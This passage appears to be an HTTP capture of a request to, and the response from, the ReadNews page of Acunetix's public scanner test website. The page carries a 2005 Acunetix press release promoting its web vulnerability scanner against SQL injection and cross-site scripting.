ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
